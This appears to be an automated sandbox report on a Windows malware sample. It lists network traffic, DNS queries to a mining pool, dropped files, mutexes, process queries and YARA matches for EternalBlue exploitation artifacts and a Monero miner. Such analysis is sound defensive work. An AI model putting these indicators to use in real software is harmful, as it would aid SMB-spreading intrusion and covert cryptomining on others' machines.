Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=6eSwnmUbUK8dDS9&MD=PVTUpA2Z HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=6eSwnmUbUK8dDS9&MD=PVTUpA2Z HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: nishabii.xyz
Source: global traffic	DNS traffic detected: DNS query: auto.c3pool.org

Source: spread.txt.0.dr	String found in binary or memory: http://%s:%d/spread.txt
Source: X86.dll.0.dr	String found in binary or memory: http://192.168.2.5:19490/spread.txt
Source: x00zm3KVwb.exe, spread.txt.0.dr	String found in binary or memory: http://iexplore.exeopenWelcome
Source: spread.txt.0.dr	String found in binary or memory: http://www.baidu.com/search/spider.html
Source: spread.txt.0.dr	String found in binary or memory: http://www.baidu.com/search/spider.html)
Source: x00zm3KVwb.exe, spread.txt.0.dr	String found in binary or memory: http://www.baidu.com/search/spider.html)95.179.220.100Windows
Source: x00zm3KVwb.exe, spread.txt.0.dr	String found in binary or memory: https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS
Source: syabcd.exe, 00000059.00000002.2062381455.00007FF66FAE1000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51911
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703

Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:50015 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:51911 version: TLS 1.2

Source: Conhost.exe	Process created: 70
Source: conhost.exe	Process created: 51
Source: cmd.exe	Process created: 91

System Summary

Malicious sample detected (through community Yara rule)

Source: x00zm3KVwb.exe, type: SAMPLE	Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 19.2.x00zm3KVwb.exe.330000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 0.0.x00zm3KVwb.exe.330000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 62.0.x00zm3KVwb.exe.330000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 19.0.x00zm3KVwb.exe.330000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 62.2.x00zm3KVwb.exe.330000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 89.2.syabcd.exe.7ff66fae0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 89.2.syabcd.exe.7ff66fae0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000000.00000003.2180544900.00000000038BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 00000000.00000003.2181302277.00000000038BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 00000000.00000000.2011066839.00000000005EA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 00000013.00000000.2023397637.00000000005EA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 00000013.00000002.2029337004.00000000005EA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 00000000.00000003.2180356791.00000000038BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 0000003E.00000002.2054520741.00000000005EA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 0000003E.00000000.2047317453.00000000005EA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: Process Memory Space: x00zm3KVwb.exe PID: 5708, type: MEMORYSTR	Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: Process Memory Space: x00zm3KVwb.exe PID: 7120, type: MEMORYSTR	Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: Process Memory Space: x00zm3KVwb.exe PID: 7796, type: MEMORYSTR	Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: C:\ProgramData\spread.txt, type: DROPPED	Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen

Source: C:\Users\user\Desktop\x00zm3KVwb.exe

Process Stats: CPU usage > 49%

Source: Joe Sandbox View	Dropped File: C:\ProgramData\SMB.exe 5214F356F2E8640230E93A95633CD73945C38027B23E76BB5E617C71949F8994
Source: Joe Sandbox View	Dropped File: C:\ProgramData\syabcd.exe AC530D542A755ECCE6A656EA6309717EC222C34D7E34C61792F3B350A8A29301

Source: C:\Users\user\Desktop\x00zm3KVwb.exe

Process token adjusted: Security

Source: x00zm3KVwb.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: x00zm3KVwb.exe, type: SAMPLE	Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 19.2.x00zm3KVwb.exe.330000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 0.0.x00zm3KVwb.exe.330000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 62.0.x00zm3KVwb.exe.330000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 19.0.x00zm3KVwb.exe.330000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 62.2.x00zm3KVwb.exe.330000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 89.2.syabcd.exe.7ff66fae0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 89.2.syabcd.exe.7ff66fae0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000000.00000003.2180544900.00000000038BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 00000000.00000003.2181302277.00000000038BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 00000000.00000000.2011066839.00000000005EA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 00000013.00000000.2023397637.00000000005EA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 00000013.00000002.2029337004.00000000005EA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 00000000.00000003.2180356791.00000000038BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 0000003E.00000002.2054520741.00000000005EA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 0000003E.00000000.2047317453.00000000005EA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: Process Memory Space: x00zm3KVwb.exe PID: 5708, type: MEMORYSTR	Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: Process Memory Space: x00zm3KVwb.exe PID: 7120, type: MEMORYSTR	Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: Process Memory Space: x00zm3KVwb.exe PID: 7796, type: MEMORYSTR	Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: C:\ProgramData\spread.txt, type: DROPPED	Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts

Source: classification engine

Classification label: mal100.troj.expl.evad.mine.winEXE@2333/8@68/100

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7176:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3472:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5144:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7212:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6524:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5484:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2944:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7428:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4332:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4956:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4712:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6464:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1868:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Mutant created: \Sessions\1\BaseNamedObjects\nishabii.xyz
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5556:120:WilError_03

Source: x00zm3KVwb.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\ProgramData\syabcd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\ProgramData\syabcd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\ProgramData\syabcd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
